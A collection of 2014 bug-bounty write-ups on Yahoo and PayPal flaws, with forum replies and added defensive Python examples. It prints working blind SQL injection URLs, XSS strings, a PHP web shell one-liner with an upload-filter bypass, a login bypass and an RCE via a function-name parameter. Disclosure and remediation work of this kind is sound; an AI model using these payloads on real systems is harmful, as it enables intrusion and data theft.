b3hr0uz

  1. First of all, let’s figure out the database version:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

Which is false (version 4) and will sleep for 20 seconds. Let’s try version 5:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

After a quick second we got returned to our data-table page.

Now as far as the database name goes, I will demonstrate only a few things, due to the fact that the user length was 24 letters and the database name was 6 letters:

username: ****ww

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

and for the username: ***********@**.***.*.*** (taken out for security purposes), but as you can see the 15th letter is shown to be a “.” in the URL below:

http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114

After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be covering an XSPA and XSS in a few services.

Behrouz Sadeghipour @NahamSec NahamSec.com | Behrouz Sadeghipour's Personal Website
  2. Hello. Normally I don’t write a write-up for an XSS vulnerability; however, this XSS was a bit different because it affects hundreds of Yahoo! subdomains. After my SQL injection on the HK subdomains, I decided to actually start focusing on the more major subdomains of Yahoo, and as a result I was able to XSS quite a few of Yahoo’s services. Here are a few to name:

Travel, Food, Autos, Security, Developer, News, Weather, Shine, Shopping, Celebrity, TV, Voices, Homes, Music, Finance, Cricket

The list doesn’t stop there. This vulnerability affects all of Yahoo’s services where a user is able to make a comment, including the list above in other languages as well.

Now the question is: was this a self-XSS, or did it get stored somewhere and get presented to other users? The answer to that question is… BOTH!

The Research: Now how is this possible, and what was the process for all of this? In the beginning of the research I decided to poke around the “Tech” services of Yahoo, found a comment section and decided to comment on this post and give it the following string:

“><img src=x onerror=prompt(1);>

Which left me with the execution of an IMG ( “> ) tag but no prompt. So I decided to try a few other strings, and that led me to using HTML entities and changing it to the following format:

"><img src=x onerror=confirm(1);>

Now what? Voila! We get the famous confirm(1) to pop up. But how does this explain the XSS on all of the Yahoo services listed and more?! Well, the tech blog wasn’t the only place that had a comment section. Many of Yahoo’s services have a comment section. Some use the same exact comment platform as the one on “Tech” and “Travel” and some have a different comment platform, like the one on Sports, Weather, and Finance, BUT they both store the comments in a tab under “My Comments” -> “All Comments”, and you will see the stored self-XSS there.

The “Self XSS” could also be engineered to be seen in the “Most recent” or “Most discussed” topics to execute and run the specific XSS string.

Why is this a critical vulnerability? (Attack Vector) The websites which use the same platform as the attached video (same as the one on the Tech, Food, and Travel services) will store the string and present it to anyone visiting the post containing the comment. So with a simple bot and an easy copy/paste, we could post a comment containing malicious code to hijack the visitors’/emails’ session/cookie. We could also simply target a specific user by linking them to a post containing a comment with malicious code by the attacker.

Who’s affected by this vulnerability? Thousands (if not millions) of users use Yahoo and Yahoo Mail in the 65 countries supported by Yahoo. Each Yahoo international/country domain (such as Hong Kong, Taiwan, Netherlands, India) uses one of the 2 comment platforms in their daily blogs such as news, food, tech, sports, etc., which get thousands of Yahoo and non-Yahoo member visitors daily and could have been a target of this vulnerability.

Demo: Here’s a short video describing the attack, just to show a few other subdomains that were affected by this vulnerability: https://www.youtube.com/watch?v=3E80IDj0X_E

Behrouz Sadeghipour 5/25/2014

Timeline:
04/29/2014 – Initial Report
04/29/2014 – Triaged
04/30/2014 – Comments section disabled on Y! Services
05/02/2014 – Patched but no update
05/16/2014 – Resolved and granted permission to publish
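An added example (editor's code, not from the post above): the post's string "><img src=x onerror=confirm(1);> works by closing the attribute or element the comment text lands in and starting its own tag. Below, render_comment_vulnerable() splices stored text straight into a template, and render_comment_escaped() HTML-encodes it in both the attribute and the element slot. The template markup and the sample author name are invented for the demo; the two payloads are the ones quoted on this page (the second is from the last reply below).

```python
"""Stored comment text in an HTML template: unsafe and escaped rendering (added example)."""
import html
import re

PAYLOAD_ATTR = '"><img src=x onerror=confirm(1);>'   # from the Yahoo comment write-up
PAYLOAD_TAG = "<i onmouseover=alert(1)>"            # from the last reply on this page

# Constructed template: one quoted attribute slot and one element slot for user text.
TEMPLATE = '<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_vulnerable(author, body):
    """Stored text is trusted: a '"' in author or a '<' in body changes the DOM."""
    return TEMPLATE.format(author=author, body=body)


def render_comment_escaped(author, body):
    """quote=True also encodes '"' and "'", which is what protects the attribute slot.

    This is only sufficient because every attribute in TEMPLATE is quoted; an
    unquoted attribute can still be broken out of with a space, which html.escape
    leaves alone. The same escaping has to be applied at every sink that shows the
    comment (the article page and the "My Comments" tab the post mentions).
    """
    return TEMPLATE.format(author=html.escape(author, quote=True),
                           body=html.escape(body, quote=True))


def foreign_tags(markup):
    """Tag names present in markup that the template itself does not emit."""
    return sorted({t.lower() for t in re.findall(r"<(\w+)", markup)} - {"div", "p"})


if __name__ == "__main__":
    for render in (render_comment_vulnerable, render_comment_escaped):
        out = render("bob", PAYLOAD_ATTR)
        print(f"{render.__name__}: {foreign_tags(out) or 'no injected tags'}")
```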
  3. Hello, this write-up will cover how I bypassed one of Yahoo’s login pages with a simple trick. Even though I had decided not to write anything about this report (since it was out of scope), a few people wanted to see the trick and I thought it would be a great thing to share with everyone else. (So please don’t bother to mention it’s out of scope, and carry on with the post.)

Let’s have a look at what caught my attention in the first place that led on to the attack: Which took me to the following URL: However, by clicking on any of the following links I would be redirected to a login page that kind of looks like this:

The first step I took was to run curl and see if I was able to see the content of the files on my own server, so:

curl http://tw.urcosme.fashion.yahoo.net/justbeauty/Vol/22/edit > u2.html

Now that I knew I was able to see the content, I decided to switch to Firefox and fire up the good ol’ NoRedirect: WE ARE IN.

Here are a couple of things I was able to do: Add new content: Edit: and I was also able to upload a file, which you will be able to see here: I was able to get the full path and MySQL credentials by messing around with POST. There was also a possible SQLi via POST in the following admin panel, which I wasn’t able to exploit due to the fact that I found the bug after the initial report.

Timeline:
2014/04/18 – Reported
2014/04/18 – Triaged
2014/04/18 – Requested more information
2014/04/21 – Closed
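An added example (editor's code, not from the post above): curl saved the editor pages and NoRedirect let Firefox show them, which is what happens when the server renders the protected page and only then tells the client to go to the login form, whether with a meta refresh, a script, or a 3xx that still carries the body. The handlers below model that flaw next to the fix, which decides before rendering and sends nothing but the redirect. The admin markup, the session dictionary and the URL paths are invented for the demo.

```python
"""Authorization decided client-side versus server-side (added example)."""
ADMIN_HTML = "<h1>justbeauty editor</h1><form method=post>...</form>"  # constructed stand-in
LOGIN_URL = "/login"

# Handlers return (status, headers, body), the shape a WSGI-style framework hands back.


def admin_redirect_after_render(session):
    """Flawed: the body is always produced; anonymous users merely get a
    meta-refresh prepended. Anything that ignores the refresh (curl, the
    NoRedirect extension, a script) reads the whole page."""
    body = ADMIN_HTML
    if "user" not in session:
        body = f'<meta http-equiv="refresh" content="0; url={LOGIN_URL}">' + body
    return 200, {"Content-Type": "text/html"}, body


def admin_check_before_render(session):
    """Fixed: decide first, and send an empty body with the redirect when unauthenticated."""
    if "user" not in session:
        return 302, {"Location": LOGIN_URL}, ""
    return 200, {"Content-Type": "text/html"}, ADMIN_HTML


def require_login(handler):
    """Same rule as a decorator, so every admin handler gets it instead of a copied check."""
    def wrapped(session, *args, **kwargs):
        if "user" not in session:
            return 302, {"Location": LOGIN_URL}, ""
        return handler(session, *args, **kwargs)
    return wrapped


@require_login
def admin_edit(session, article_id):
    return 200, {"Content-Type": "text/html"}, f"<h1>edit {article_id}</h1>"


def leaks_admin_content(handler, *args):
    """True if an anonymous caller (empty session) gets a 200 with a body."""
    status, _headers, body = handler({}, *args)
    return status == 200 and bool(body)


if __name__ == "__main__":
    print("redirect-after-render leaks:", leaks_admin_content(admin_redirect_after_render))
    print("check-before-render leaks:  ", leaks_admin_content(admin_check_before_render))
```

The check belongs in one place that every admin route passes through (the decorator here, or middleware on the /admin prefix), since the bypass in the post did not need to defeat the login form at all; it only needed one route that forgot to ask.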
  4. Source: PayPal Marketing Remote Code Execution, Information Disclosure and XSS | NahamSec - Behrouz Sadeghipour's Personal Website

Hello everyone, today I will be writing about my experience with PayPal’s Bug Bounty Program and how I was able to discover a Remote Code Execution on one of their branded websites. While auditing PayPal-Marketing.com for a few XSS vulnerabilities I came across a strange URL:

https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getPartnerBasic&list=34158729+24555431948+28165489

Which displayed the content of the 3 IDs provided in the link. So I figured I might be able to execute SQL commands and hoped for RCE. However, that wasn’t the case. After a few tries I realized that my SQL injection was irritating the getPartnerBasic function by producing errors disclosing the full path of the website and mentioning the getPartnerBasic() function. So I decided to replace getPartnerBasic with phpinfo and see if that would do something (I doubt it!). However, the following process resulted in: and I immediately reported the vulnerability to PayPal and received the following email:

Hey, were you actually able to run any other commands, or just get the version and PHPinfo? Thanks, PayPal Security Team

To make sure this wasn’t lowered from an RCE to an information disclosure, I replied to the PayPal Security Team with the following links, which provided them with more information than phpinfo:

PID https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getmypid&list=(34158729)
GID https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getmygid&list=(34158729)
UID https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getmyuid&list=34158729

PayPal was extremely fast and patched the vulnerability in under 24 hours.

Here’s the PoC video:

Cross-Site Scripting: I was also able to report an XSS in the search module of the PayPal-Marketing partner’s page by searching for an IMG tag injected with XSS. Vulnerable URL: https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/
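An added example (editor's code, not from the post above): the phpinfo, getmypid, getmygid and getmyuid links in the post suggest dirmob_db.php passed the action parameter straight to a function call, so any function in scope could be named. Python's equivalent is resolving the name through globals() and calling it; the fix is a fixed mapping from action names to handlers. The partner records, the DEMO_SECRET environment variable and the handler names below are invented for the demo, and the list parameter is split on whitespace because that is what the '+' in the post's URL decodes to.

```python
"""Request-controlled function dispatch and the allow-list fix (added example)."""
import os

os.environ["DEMO_SECRET"] = "hunter2"   # constructed: something the process can read

# Constructed partner table; the IDs are the ones in the post's URL.
PARTNERS = {34158729: "Acme Payments", 24555431948: "Globex", 28165489: "Initech"}


def parse_ids(raw_list):
    """'list' parameter: whitespace-separated integers, nothing else accepted."""
    ids = raw_list.split()
    if not ids or not all(i.isdigit() for i in ids):
        raise ValueError("list must be whitespace-separated integers")
    return [int(i) for i in ids]


def getPartnerBasic(raw_list):
    """The intended handler."""
    return [PARTNERS.get(i) for i in parse_ids(raw_list)]


def dispatch_vulnerable(action, arg):
    """Resolve 'action' by name; dotted names walk attributes (e.g. os.getenv).

    This mirrors calling $action($list) in PHP: the request decides what runs,
    and anything importable or defined in this module is reachable.
    """
    head, *rest = action.split(".")
    fn = globals()[head]
    for part in rest:
        fn = getattr(fn, part)
    return fn(arg)


ACTIONS = {"getPartnerBasic": getPartnerBasic}   # the only names a request may select


def dispatch_safe(action, arg):
    """Fixed: look the action up in a fixed table; unknown names are an error, not a call."""
    try:
        handler = ACTIONS[action]
    except KeyError:
        raise ValueError(f"unknown action {action!r}") from None
    return handler(arg)


if __name__ == "__main__":
    ids = "34158729 24555431948 28165489"
    print(dispatch_vulnerable("getPartnerBasic", ids))
    print("leaked:", dispatch_vulnerable("os.getenv", "DEMO_SECRET"))
    print(dispatch_safe("getPartnerBasic", ids))
```

A name-to-handler table also gives you the place to attach per-action input validation and authorization, which a bare dynamic call never has.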
  5. Not in scope, correct. However, I could’ve still managed to do a lot of damage, steal emails, or extract information. The server was using an old 2.6.32 kernel, lol, and I was already at UID/GID 2 without using any exploits! I did complain about the bounty amount, but there’s not much I could do about it! @akkiliON: Thanks, man!
  6. Before saying this isn't in scope, please read the whole article.

Hello everyone, recently I was analyzing an XSS vulnerability on one of Yahoo's subdomains where I decided to also analyze the HTTP headers. While doing so, I came across the admin login page on (hk.yahoo.net), due to the fact that the search was being posted to a search module from the admin panel. Well, that's not the best part! Once I got to the admin page I thought to myself there's no way I will get past this page, and someone has probably tried to get past this before... but wait! I wanna try user/password as admin/admin... 'cause I'm funny and I want to try it before I look into other ways to obtain a user (like SQLi). Unfortunately, I was able to log in to the admin panel with admin/admin credentials. No SQLi or anything needed!

After snooping around for a few minutes, I came across an edit/insert page where I was able to create a new page and insert the needed pictures and information. Since I was able to log in with admin/admin, I figured the upload section would possibly allow me to bypass the upload restriction. As a part of my test I decided to create a file with the following name: Shell.php.jpg, and I inserted a simple:

<?passthru($_GET[v])?>

and uploaded the file as I monitored the HTTP headers, revised those headers, replayed them, and successfully changed the file name back to shell.php.

Now here's where it gets interesting: (And yes, I did use a c99 shell to make everything easier!) As you can see, our UID/GID is 2 (daemon). I had read/write/execute permissions in /home, which contains a few more subdomains and websites. Also, the Linux kernel is VERY old and is rootable. Not to mention I was able to read most dirs and files (but NOT including /etc/shadow). Here's the PoC video sent to Yahoo as a part of this research:

Lessons learned: Don't set your username and password the same. Don't set your username and password as admin. And have a better and more restrictive uploader.

Is it in scope? We don't know yet. Should it be? Yes! Why? Because most of the hk.ent.yahoo.com files are loaded and included from the .net domain and/or redirect to it. Also, there was more than just one domain I could access via this vulnerability:

Timeline:
2014-02-20 Reported
2014-02-20 Status was changed to Triaged
2014-02-21 Patched

Bounty? Nothing yet!
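An added example (editor's code, not from the post above): the upload in the post went through because the server judged Shell.php.jpg by its name alone and then stored it under whatever filename the replayed request said, so changing the header to shell.php was enough. accept_vulnerable() models that behaviour; accept_hardened() checks only the final extension against an allow list, requires the file's leading bytes to match that type, and stores under a random server-generated name so the client's filename never reaches disk. The file contents and names below are constructed for the demo (FAKE_JPEG is a JFIF-looking header, not a real image).

```python
"""Upload validation: trust nothing the client sends about the file (added example)."""
import os
import uuid

MAGIC = {                      # final extension -> acceptable leading bytes
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
PHP_SHELL = b"<?passthru($_GET[v])?>"            # the one-liner from the post
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed: JFIF-looking bytes, not a real image


def accept_vulnerable(client_filename, content):
    """Name ends in an image extension? Then keep it, as sent, with no look at the bytes.

    Shell.php.jpg passes, and because the stored name is the client's, a replayed
    request that says shell.php is stored as shell.php.
    """
    if not client_filename.lower().endswith((".jpg", ".jpeg", ".png", ".gif")):
        return None
    return client_filename


def accept_hardened(client_filename, content):
    """Return the server-side name to store under, or None to reject."""
    ext = os.path.splitext(client_filename)[1].lstrip(".").lower()
    if ext not in MAGIC:
        return None                                  # shell.php, shell.phtml, no extension ...
    if not content.startswith(MAGIC[ext]):
        return None                                  # Shell.php.jpg whose bytes are PHP, not JPEG
    if b"<?" in content:
        return None                                  # crude polyglot check: image header + PHP tail;
                                                     # re-encoding the image is the robust version
    return f"{uuid.uuid4().hex}.{ext}"               # client-chosen name never reaches disk


if __name__ == "__main__":
    for name, data in (("Shell.php.jpg", PHP_SHELL), ("shell.php", PHP_SHELL), ("Shell.php.jpg", FAKE_JPEG)):
        print(f"{name:14} vulnerable={accept_vulnerable(name, data)!s:14} hardened={accept_hardened(name, data)}")
```

Validation is only one layer: the upload directory should also sit outside the web root or have script execution disabled, so that a file which does slip through is served as bytes rather than run as PHP.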
  7. what string did you use? <script>alert(/1337/)</script>?
  8. Does Cisco offer bounties for XSS?
  9. Thank you, sensi. I have reported a few myself. I am just trying to get in touch with other researchers and came across your post! Great work, man! I was lucky enough to find one on Yahoo! Send me your contact info; let's trade some information!
  10. Hi, can you publish the string you used for the XSS? <i onmouseover=alert(1)>